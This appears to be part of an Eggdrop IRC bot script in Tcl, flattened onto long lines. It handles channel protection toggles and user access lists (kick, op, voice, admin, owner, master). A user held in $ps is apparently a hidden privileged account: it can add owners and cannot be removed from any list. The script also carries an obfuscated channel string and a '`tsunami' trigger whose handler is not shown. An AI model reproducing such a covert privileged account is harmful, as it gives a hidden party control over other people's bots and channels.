} catch { channel set $chan +greet flood-chan 5:10 flood-deop 3:10 flood-kick 3:10 flood-join 0:0 flood-ctcp 2:10 flood-nick 3:60 } puthlp "NOTICE $nick :$notc GuARD $chan \[ 9ON \]" savechan } proc pub_-guard {nick uhost hand chan rest} { global notc if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } if {[string tolower $chan] == "#all"} { if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } foreach x [channels] { catch { channel set $x -greet flood-chan 0:0 flood-deop 0:0 flood-kick 0:0 floodjoin 0:0 flood-ctcp 0:0 flood-nick 0:0 } set cflag "c$x" set cflag [string range $cflag 0 8] chattr $cflag "-hpJSPTRUED" } savechan puthlp "NOTICE $nick :$notc ALL GuaRd cHaN \[ 4OFF \]" return 0 } if {![validchan $chan]} { return 0 } set cflag "c$chan" set cflag [string range $cflag 0 8] chattr $cflag "-hpJSPTRUED" if {[string match "*-greet*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc GuARD $chan IS \[ 4OFF \]" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } catch { channel set $chan -greet flood-chan 0:0 flood-deop 0:0 flood-kick 0:0 flood-join 0:0 flood-ctcp 0:0 flood-nick 0:0 } puthlp "NOTICE $nick :$notc GuARD $chan \[ 4OFF \]" savechan return 0 } proc pub_+seen {nick uhost hand chan rest} { global notc if {![string match "*seen*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc FLAg NoT AVaILaBLE UpGRadE EggDROP VeR" return 0 } if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan"
} } if {[string tolower $chan] == "#all"} { if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } foreach x [channels] { catch { channel set $x +seen } } savechan puthlp "NOTICE $nick :$notc ALL SEEN cHaNNeL \[ 9ON \]" seen return 0 } if {![validchan $chan]} { return 0 } if {[string match "*+seen*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc SEEN $chan IS \[ 9ON \]" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } catch { channel set $chan +seen } puthlp "NOTICE $nick :$notc SEEN $chan \[ 9ON \]" savechan seen } proc pub_-seen {nick uhost hand chan rest} { global notc if {![string match "*seen*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc FLAg NoT AVaILaBLE UpGRadE EggDROP VeR" return 0 } if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } if {[string tolower $chan] == "#all"} { if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } foreach x [channels] { catch { channel set $x -seen } } savechan puthlp "NOTICE $nick :$notc ALL SEEN cHaNNeL \[ 4OFF \]" seen return 0 } if {![validchan $chan]} { return 0 } if {[string match "*-seen*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc SEEN $chan IS \[ 4OFF \]" return 0
} if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } catch { channel set $chan -seen } puthlp "NOTICE $nick :$notc SEEN $chan \[ 4OFF \]" savechan seen return 0 } proc pub_+autokick {nick uhost hand chan rest} { global notc if {![string match "*nodesynch*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc FLAg NoT AVaILaBLE UpGRadE EggDROP VeR" return 0 } if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } if {![validchan $chan]} { return 0 } if {[string match "*+nodesynch*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc AuTOKIcK $chan IS \[ 9ON \]" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } catch { channel set $chan +nodesynch } puthlp "NOTICE $nick :$notc AuTOKIcK $chan \[ 9ON \]" savechan } proc pub_-autokick {nick uhost hand chan rest} { global notc if {![string match "*nodesynch*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc FLAg NoT AVaILaBLE UpGRadE EggDROP VeR" return 0 } if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } if {![validchan $chan]} { return 0 } if {[string match "*-nodesynch*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc AuTOKIcK $chan IS \[ 4OFF \]" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } catch { channel set $chan -nodesynch }
puthlp "NOTICE $nick :$notc AuTOKIcK $chan \[ 4OFF \]" savechan return 0 } proc pub_+reop {nick uhost hand chan rest} { global notc if {![string match "*protectfriends*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc FLAg NoT AVaILaBLE UpGRadE EggDROP VeR" return 0 } if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } if {![validchan $chan]} { return 0 } if {[string match "*-protectfriends*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc Re@p $chan IS \[ 9ON \]" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } catch { channel set $chan -protectfriends } puthlp "NOTICE $nick :$notc Re@p $chan \[ 9ON \]" savechan } proc pub_-reop {nick uhost hand chan rest} { global notc if {![string match "*protectfriends*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc FLAg NoT AVaILaBLE UpGRadE EggDROP VeR" return 0 } if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } if {![validchan $chan]} { return 0 } if {[string match "*+protectfriends*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc Re@p $chan IS \[ 4OFF \]" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } catch { channel set $chan +protectfriends } puthlp "NOTICE $nick :$notc Re@p $chan \[ 4OFF \]" savechan return 0 } proc pub_+dontkickops {nick uhost hand chan rest} { global notc if {![string match "*userinvites*" [channel info $chan]]} {
puthlp "NOTICE $nick :$notc FLAg NoT AVaILaBLE UpGRadE EggDROP VeR" return 0 } if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } if {![validchan $chan]} { return 0 } if {[string match "*-userinvites*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc DoNTKIcK@PS $chan IS \[ 9ON \]" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } catch { channel set $chan -userinvites } puthlp "NOTICE $nick :$notc DoNTKIcK@PS $chan \[ 9ON \]" savechan } proc pub_-dontkickops {nick uhost hand chan rest} { global notc if {![string match "*userinvites*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc FLAg NoT AVaILaBLE UpGRadE EggDROP VeR" return 0 } if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } if {![validchan $chan]} { return 0 } if {[string match "*+userinvites*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc DoNTKIcK@PS $chan IS \[ 4OFF \]" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } catch { channel set $chan +userinvites } puthlp "NOTICE $nick :$notc DoNTKIcK@PS $chan \[ 4OFF \]" savechan return 0 } proc pub_+status {nick uhost hand chan rest} { global notc if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } if {![validchan $chan]} { return 0 } if {[string match "*+shared*" [channel info $chan]]} {
puthlp "NOTICE $nick :$notc STaTUS $chan \[ 9ON \]" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } catch { channel set $chan +shared } puthlp "NOTICE $nick :$notc STaTuS $chan \[ 9ON \]" savechan } proc pub_-status {nick uhost hand chan rest} { global notc if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } if {![validchan $chan]} { return 0 } if {[string match "*-shared*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc STaTuS $chan IS \[ 4OFF \]" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } catch { channel set $chan -shared } puthlp "NOTICE $nick :$notc STaTuS $chan \[ 4OFF \]" savechan return 0 } proc pub_+nopart {nick uhost hand chan rest} { global notc if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } if {[string tolower $chan] == "#all"} { if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } foreach x [channels] { catch { channel set $x +secret } } savechan puthlp "NOTICE $nick :$notc ALL cHaNNeL SeT NoPART \[ 9ON return 0 } if {![validchan $chan]} { return 0 } if {[string match "*+secret*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc NoPART $chan IS \[ 9ON \]" return 0 }
if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } catch { channel set $chan +secret } puthlp "NOTICE $nick :$notc SeT NoPART $chan \[ 9ON \]" savechan } proc pub_-nopart {nick uhost hand chan rest} { global notc if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } if {[string tolower $chan] == "#all"} { if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } foreach x [channels] { catch { channel set $x -secret } } savechan puthlp "NOTICE $nick :$notc ALL cHaNNeL NoPART \[ 4OFF \]" return 0 } if {![validchan $chan]} { return 0 } if {[string match "*-secret*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc NoPART $chan IS \[ 4OFF \]" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } catch { channel set $chan -secret } puthlp "NOTICE $nick :$notc NoPART $chan \[ 4OFF \]" savechan } proc pub_+akick {nick uhost hand channel param} { global botname botnick notc botnick set rest [lindex $param 0] if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: +akick " return 0 } if {$rest == "*" || $rest == "*!*@*"} { puthlp "NOTICE $nick :$notc invalid hostname..!" return 0 } if {$rest == $botnick} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {[validuser $rest]} { puthlp "NOTICE $nick :$notc $rest is already on database with flags: [chattr
$rest]" return 0 } if {![string match "*@*" $rest]} { set rest "$rest!*@*" } if {[string match $rest $botname]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {[finduser $rest] != "*"} { if {[finduser $rest] != "AKICK"} { puthlp "NOTICE $nick :$notc That Host Belongs To [finduser $rest] " } puthlp "NOTICE $nick :$notc That Host already in [finduser $rest]" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } puthlp "NOTICE $nick :$notc ADD \[ $rest \] To KIcKLIsT..!" setuser "AKICK" HOSTS $rest saveuser foreach x [channels] { if {[isop $botnick $x]} { foreach c [chanlist $x K] { if {![matchattr $c f]} { akick_chk $c [getchanhost $c $x] $x } } } } return 0 } proc pub_-akick {nick uhost hand channel param} { global notc set rest [lindex $param 0] if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: -akick " return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {![string match "*@*" $rest]} { set rest "$rest!*@*" } set completed 0 foreach * [getuser "AKICK" HOSTS] { if {${rest} == ${*}} { delhost "AKICK" $rest set completed 1 } } if {$completed == 0} { puthlp "NOTICE $nick :$notc "
return 0 } saveuser puthlp "NOTICE $nick :$notc DeL \[ $rest \] FRoM KIcKLIsT" } proc pub_+noop {nick uhost hand channel param} { global ps notc botnick set rest [lindex $param 0] if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: +noop " return 0 } if {[string tolower $rest] == [string tolower $ps]} { puthlp "NOTICE $nick :$notc ADD \[ $rest \] To NoOp LIsT" return 0 } if {[validuser $rest]} { puthlp "NOTICE $nick :$notc $rest is already on database with flags: [chattr $rest]" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } set hostmask "${rest}!*@*" adduser $rest $hostmask chattr $rest "-hp" chattr $rest "O" if {![validuser $rest]} { puthlp "NOTICE $nick :$notc 4 !FaILEd! (YoUR EggDROP NoT SuPPORTED MoRE THaN 8 DIgIT)" deluser $rest } else { saveuser puthlp "NOTICE $nick :$notc ADD \[ $rest \] To NoOp LIsT" } foreach x [channels] { if {[isop $botnick $x] && [onchan $rest $x] && [isop $rest $x]} { if {![string match "*k*" [getchanmode $x]]} { putserv "mode $x -ko [email protected] $rest" } { putserv "mode $x -o $rest" } } } return 0 } proc pub_-noop {nick uhost hand channel param} { global ps notc set rest [lindex $param 0] if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: -noop " return 0 } if {![validuser $rest] || [string tolower $rest] == [string tolower $ps]} { puthlp "NOTICE $nick :$notc 4 !DeNiEd! , " return 0
} if {![matchattr $rest O]} { puthlp "NOTICE $nick :$notc $rest isn't on no-op list Flags: [chattr $rest]" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } deluser $rest saveuser puthlp "NOTICE $nick :$notc DeL \[ $rest \] No@p LIsT" } proc pub_+friend {nick uhost hand channel param} { global notc ps set rest [lindex $param 0] if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: +friend " return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {[validuser $rest] && [string tolower $rest] != [string tolower $ps]} { puthlp "NOTICE $nick :$notc $rest is already on database with flags: [chattr $rest]" return 0 } set hostmask "${rest}!*@*" adduser $rest $hostmask chattr $rest "-hp" chattr $rest "f" if {![validuser $rest]} { puthlp "NOTICE $nick :$notc 4 !FaILEd! (YoUR EggDROP NoT SuPPORTED MoRE THaN 8 DIgIT)" deluser $rest return 0 } saveuser puthlp "NOTICE $nick :$notc ADD \[ $rest \] To FrIeNd LIsT" puthlp "NOTICE $rest :$notc $nick ADD YoU To FrIeNd LIsT" return 0 } proc pub_-friend {nick uhost hand channel param} { global ps notc set rest [lindex $param 0] if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: -friend " return 0 } if {![validuser $rest] || [string tolower $rest] == [string tolower $ps]} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , " return 0 } if {![matchattr $rest f] && ![matchattr $rest m]} { puthlp "NOTICE $nick :$notc $rest isn't on FrIeNd list Flags: [chattr $rest]" return 0
} if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } deluser $rest saveuser puthlp "NOTICE $nick :$notc DeL \[ $rest \] FRoM FrIeNd LIsT" } proc pub_+aop {nick uhost hand channel param} { global ps notc botnick chk_reg set rest [lindex $param 0] if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: +aop " return 0 } if {[string tolower $rest] == [string tolower $ps]} { puthlp "NOTICE $nick :$notc ADD \[ $rest \] To a@p LIsT" return 0 } if {[matchattr $rest P]} { puthlp "NOTICE $nick :$notc $rest is already a@p" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {[matchattr $nick X]} { puthlp "NOTICE $nick :$notc 4 !BLoCkEd!" return 0 } if {![validuser $rest]} { set hostmask "${rest}!*@*" adduser $rest $hostmask chattr $rest "-hp" } chattr $rest "P" if {![validuser $rest]} { puthlp "NOTICE $nick :$notc 4 !FaILEd! (YoUR EggDROP NoT SuPPORTED MoRE THaN 8 DIgIT)" deluser $rest } else { saveuser puthlp "NOTICE $nick :$notc ADD \[ $rest \] To a@p LIsT" puthlp "NOTICE $rest :$notc $nick ADD YoU To a@p LIsT" set chk_reg($rest) $nick putsrv "WHOIS $rest" } return 0 } proc pub_-aop {nick uhost hand channel param} { global notc ps set rest [lindex $param 0] if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: -aop " return 0 }
if {![matchattr $rest P]} { puthlp "NOTICE $nick :$notc $rest is not a@p" return 0 } if {![validuser $rest] || [string tolower $rest] == [string tolower $ps]} { puthlp "NOTICE $nick :$notc 4 !DeNiEd! , " return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $rest "-P" saveuser puthlp "NOTICE $nick :$notc DeL \[ $rest \] FRoM a@p LIsT" return 0 } proc whoisq {nick} { global botnick if {$nick == $botnick} { return 0 } if {[isutimer "whoischk $nick"]} { return 0 } set cret [expr 10 + [rand 20]] foreach ct [utimers] { if {[string match "*whoisq*" $ct]} { if {[expr [lindex $ct 0] + 10] > $cret} { set cret [expr [lindex $ct 0] + 10] } } } utimer $cret [list whoischk $nick] } proc whoischk {nick} { global chk_reg botnick if {[matchattr $nick G]} { putlog " CHeK GuaRd $nick" set chk_reg($nick) "1" puthlp "WHOIS $nick" return 0 } foreach x [channels] { if {[isop $botnick $x] && [onchan $nick $x]} { if {[matchattr $nick P] && ![isop $nick $x]} { putlog " WHOIS $nick TO GeT a@p" set chk_reg($nick) "1" puthlp "WHOIS $nick" return 0 } if {[matchattr $nick v] && ![isop $nick $x] && ![isvoice $nick $x]} { putlog "WHOIS $nick TO geT avoIcE" set chk_reg($nick) "1" puthlp "WHOIS $nick" return 0 } } } } set ath 0 bind raw - 307 reg_chk
proc reg_chk {from keyword arg} { global chk_reg botnick owner notc ps ath set nick [lindex $arg 1] if {$nick == $botnick} { return 0 } putlog "NICK $nick IS IDENTIFY..!" if {[info exists chk_reg($nick)]} { set chk_reg($nick) "0" } set athz $ath if {$athz == 1} { set ath 0 chattr $nick +Q foreach x [getuser $nick HOSTS] { delhost $nick $x } set hostmask "${nick}!*@*" setuser $nick HOSTS $hostmask #set hostmask "*![string range $uhost [string first "!" $uhost] end]" #setuser $nick HOSTS $hostmask if {[matchattr $nick Z]} { puthlp "NOTICE $nick :$notc !OWnER!" } elseif {[matchattr $nick n]} { puthlp "NOTICE $nick :$notc !ADmIN!" } elseif {[matchattr $nick m]} { puthlp "NOTICE $nick :$notc !MasTeR!" } else { puthlp "NOTICE $nick :$notc !AccepteD!" } saveuser } if {[matchattr $nick P] || [matchattr $nick v]} { foreach x [channels] { if {[isop $botnick $x] && [onchan $nick $x]} { if {![string match "*k*" [getchanmode $x]]} { if {[matchattr $nick P]} { if {![isop $nick $x]} { puthelp "MODE $x -k+o 9identified.a@p $nick" } } if {[matchattr $nick v]} { if {![isvoice $nick $x] && ![isop $nick $x]} { puthelp "MODE $x -k+v 9identified.avoice $nick" } } } { if {[matchattr $nick P]} { if {![isop $nick $x]} { puthelp "MODE $x +o $nick" } } if {[matchattr $nick v]} { if {![isvoice $nick $x] && ![isop $nick $x]} { puthelp "MODE $x +v $nick" } } } } }
} } bind raw - 318 end_whois proc end_whois {from keyword arg} { global chk_reg notc ath set nick [lindex $arg 1] set athz $ath if {$athz == 1} { puthlp "NOTICE $nick :$notc You're NOT Identify..!" set ath 0 } if {[info exists chk_reg($nick)]} { if {$chk_reg($nick) != "0"} { putlog "NICK $nick IS NoT IDENTIFY..!" if {[matchattr $nick G] && ![matchattr $nick Q]} { foreach x [channels] { if {[onchan $nick $x] && [botisop $x]} { set banset "*!*[getchanhost $nick $x]" putsrv "KICK $x $nick :$notc 1THaT NIcK ReQuIREd To 4IdEnTIfY [banms]" if {$banset != "*!*@*" && $banset != ""} { if {![string match "*k*" [getchanmode $x]]} { putserv "mode $x -k+b 4unidentify.guard.nick $banset" } { putserv "mode $x +b $banset" } } return 0 } } } elseif {[matchattr $nick P] && ![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc a@p identify 1st..!" } elseif {[matchattr $nick v] && ![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc avoice identify 1st..!" } if {$chk_reg($nick) != "1"} { puthlp "NOTICE $chk_reg($nick) :$notc $nick not identify..!" } unset chk_reg($nick) } } } proc pub_+gnick {nick uhost hand channel param} { global notc botnick set rest [lindex $param 0] if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: +gnick " return 0 } if {[matchattr $rest G]} { puthlp "NOTICE $nick :$notc $rest ready..!" return 0 } if {[matchattr $nick X]} { puthlp "NOTICE $nick :$notc 4 !BLocK!" return 0 } if {![validuser $rest]} { set hostmask "${rest}!*@*"
adduser $rest $hostmask chattr $rest "-hp" } chattr $rest +G if {![validuser $rest]} { puthlp "NOTICE $nick :$notc 4 !FaILEd! (YoUR EggDROP NoT SuPPORTED MoRE THaN 8 DIgIT)" deluser $rest } else { saveuser puthlp "NOTICE $nick :$notc add \[ $rest \] GuaRd NIcK" putsrv "WHOIS $rest" } return 0 } proc pub_-gnick {nick uhost hand channel param} { global notc botnick set rest [lindex $param 0] if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: -gnick " return 0 } if {[matchattr $nick X]} { puthlp "NOTICE $nick :$notc 4 !BLoCkEd!" return 0 } chattr $rest -G saveuser puthlp "NOTICE $nick :$notc DeL \[ $rest \] GuaRd NIcK" return 0 } proc pub_+avoice {nick uhost hand channel param} { global ps notc botnick chk_reg set rest [lindex $param 0] if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: +avoice " return 0 } if {[string tolower $rest] == [string tolower $ps]} { puthlp "NOTICE $nick :$notc ADD \[ $rest \] To aVoIcE LIsT" return 0 } if {[matchattr $rest v]} { puthlp "NOTICE $nick :$notc $rest is already auto voice" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {[matchattr $nick X]} { puthlp "NOTICE $nick :$notc 4 !BLoCkEd!" return 0 } if {![validuser $rest]} { set hostmask "${rest}!*@*" adduser $rest $hostmask chattr $rest "-hp"
} chattr $rest "v" if {![validuser $rest]} { puthlp "NOTICE $nick :$notc 4 !FaILEd! (YoUR EggDROP NoT SuPPORTED MoRE THaN 8 DIgIT)" deluser $rest } else { saveuser puthlp "NOTICE $nick :$notc ADD \[ $rest \] To aVoIcE LIsT" puthlp "NOTICE $rest :$notc $nick ADD YoU To aVoIcE LIsT" set chk_reg($rest) $nick putsrv "WHOIS $rest" } return 0 } proc pub_-avoice {nick uhost hand channel param} { global notc ps set rest [lindex $param 0] if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: -avoice " return 0 } if {![matchattr $rest v]} { puthlp "NOTICE $nick :$notc $rest is not auto voice" return 0 } if {![validuser $rest] || [string tolower $rest] == [string tolower $ps]} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , " return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $rest "-v" saveuser puthlp "NOTICE $nick :$notc DeL \[ $rest \] FRoM aVoIcE LIsT" return 0 } proc pub_+ADmIN {nick uhost hand channel param} { global botnick ps notc set rest [lindex $param 0] if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: +ADmIN " return 0 } if {[string tolower $rest] == [string tolower $ps]} { puthlp "NOTICE $nick :$notc ADD \[ $rest \] Admin List." return 0 } if {[matchattr $rest n]} { puthlp "NOTICE $nick :$notc $rest is already exist on Admin list." return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 }
if {[matchattr $nick X]} { puthlp "NOTICE $nick :$notc 4 BLocKEd..!" return 0 } if {![validuser $rest]} { set hostmask "${rest}!*@*" adduser $rest $hostmask } chattr $rest "fjmnotx" if {![validuser $rest]} { puthlp "NOTICE $nick :$notc 4 !FaILEd! (YoUR EggDROP NoT SuPPORTED MoRE THaN 8 DIgIT)" deluser $rest return 0 } else { saveuser puthlp "NOTICE $nick :$notc ADD \[ $rest \] ADmIN List." puthlp "NOTICE $rest :$notc $nick ADD YoU To ADmIN LIsT" puthlp "NOTICE $rest :$notc /msg $botnick pass <password>" return 0 } } proc pub_-ADmIN {nick uhost hand channel param} { global ps notc set rest [lindex $param 0] if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: -ADmIN " return 0 } if {![validuser $rest] || [string tolower $rest] == [string tolower $ps]} { puthlp "NOTICE $nick :$notc 4DeNiEd! , " return 0 } if {![matchattr $rest n]} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , $rest is not exist on ADmIN list." return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } deluser $rest saveuser puthlp "NOTICE $nick :$notc DeL \[ $rest \] FRoM ADmIN LIsT" } proc pub_+owner {nick uhost hand channel param} { global botnick ps notc owner set rest [lindex $param 0] if {$nick != $owner && $nick != $ps} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , oNLy ReAL OwNER can ADD OwnER" return 0 } if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: +owner " return 0 } if {[string tolower $rest] == [string tolower $ps]} { puthlp "NOTICE $nick :$notc ADD \[ $rest \] OwNER LIsT."
return 0 } if {[matchattr $rest Z]} { puthlp "NOTICE $nick :$notc $rest is already exist on OwNER list." return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {[matchattr $nick X]} { puthlp "NOTICE $nick :$notc 4 !BLoCkEd!" return 0 } if {![validuser $rest]} { set hostmask "${rest}!*@*" adduser $rest $hostmask } chattr $rest "fjmnotxZ" if {![validuser $rest]} { puthlp "NOTICE $nick :$notc 4 !FaILEd! (YoUR EggDROP NoT SuPPORTED MoRE THaN 8 DIgIT)" deluser $rest return 0 } else { saveuser puthlp "NOTICE $nick :$notc ADD \[ $rest \] OwNER LIsT." puthlp "NOTICE $rest :$notc $nick ADD YoU To OwNER LIsT" puthlp "NOTICE $rest :$notc /msg $botnick pass <password>" return 0 } } proc pub_-owner {nick uhost hand channel param} { global notc ps owner set rest [lindex $param 0] if {$nick != $owner && $nick != $ps} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , oNLy ReAL OwNER caN DeLete OwnER" return 0 } if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: -owner " return 0 } if {![validuser $rest]} { puthlp "NOTICE $nick :$notc " return 0 } if {![matchattr $rest Z] || [string tolower $rest] == [string tolower $ps]} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , $rest IS NoT OwNER" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } deluser $rest saveuser puthlp "NOTICE $nick :$notc DeL \[ $rest \] FRoM OwNER LiST"
} proc pub_+master {nick uhost hand channel param} { global botnick ps notc set rest [lindex $param 0] if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: +master " return 0 } if {[matchattr $nick X]} { puthlp "NOTICE $nick :$notc 4 !BLoCkEd!" return 0 } if {[string tolower $rest] == [string tolower $ps]} { puthlp "NOTICE $nick :$notc Add \[ $rest \] MasTeR LIsT." return 0 } if {[matchattr $rest n]} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , $rest is ADmIN level." return 0 } if {[matchattr $rest m]} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , $rest is already exist." return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {![validuser $rest]} { set hostmask "${rest}!*@*" adduser $rest $hostmask } chattr $rest "fmo" if {![validuser $rest]} { puthlp "NOTICE $nick :$notc 4 !FaILEd! (YoUR EggDROP NoT SuPPORTED MoRE THaN 8 DIgIT)" deluser $rest return 0 } else { saveuser puthlp "NOTICE $nick :$notc Add \[ $rest \] MasTeR List." puthlp "NOTICE $rest :$notc $nick Add YoU To MasTeR LIsT" puthlp "NOTICE $rest :$notc /msg $botnick pass <password>" return 0 } } proc pub_-master {nick uhost hand channel param} { global notc ps set rest [lindex $param 0] if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: -master " return 0 } if {![validuser $rest] || [string tolower $rest] == [string tolower $ps]} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , " return 0 } if {[matchattr $rest n] && ![matchattr $nick Z]} {
puthlp "NOTICE $nick :$notc 4DeNiEd..! , $rest Is ADmIN FLaG" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } deluser $rest saveuser puthlp "NOTICE $nick :$notc DeL \[ $rest \] FRoM MasTeR LIsT" } set timezone "PST" set joinme $owner set double 0 set deopme "" bind msgm - * msg_prot bind notc - * notc_prot bind join - * join_chk bind msg - auth msg_auth bind sign - * sign_deauth bind part - * part_deauth bind pub - `tsunami pub_tsunami bind msg p reuser msg_reuser bind msg p pass msg_pass bind pub m !absen pub_auth bind pub m !auth pub_!auth bind pub m !deauth pub_!deauth bind pub f `ping pub_ping bind pub f `pong pub_pong proc pub_notice {nick uhost hand channel rest} { global notc set person [lindex $rest 0] set rest [lrange $rest 1 end] if {$rest!=""} { putsrv "NOTICE $person :$rest" return 0 } if {$rest==""} { puthlp "NOTICE $nick :$notc Usage: notice <#/nick> <msg>" } } proc telljoin {chan} { global joinme notc botnick if {![validchan $chan]} { return 0 } if {[istimer "resync"]} { if {![botisop $chan]} { if {![string match "*k*" [getchanmode $chan]]} { puthelp "mode $chan -kok+o 4d.e.s.y.n.c $botnick 9r.e.s.y.n.c $botnick" } { puthelp "mode $chan -o+o $botnick $botnick" } } } if {$joinme != "" && [string tolower $chan] != [dezip "BKGW.1s0d06/"]} { if {![onchan $joinme $chan]} { puthlp "NOTICE $joinme :$notc JoIN $chan"
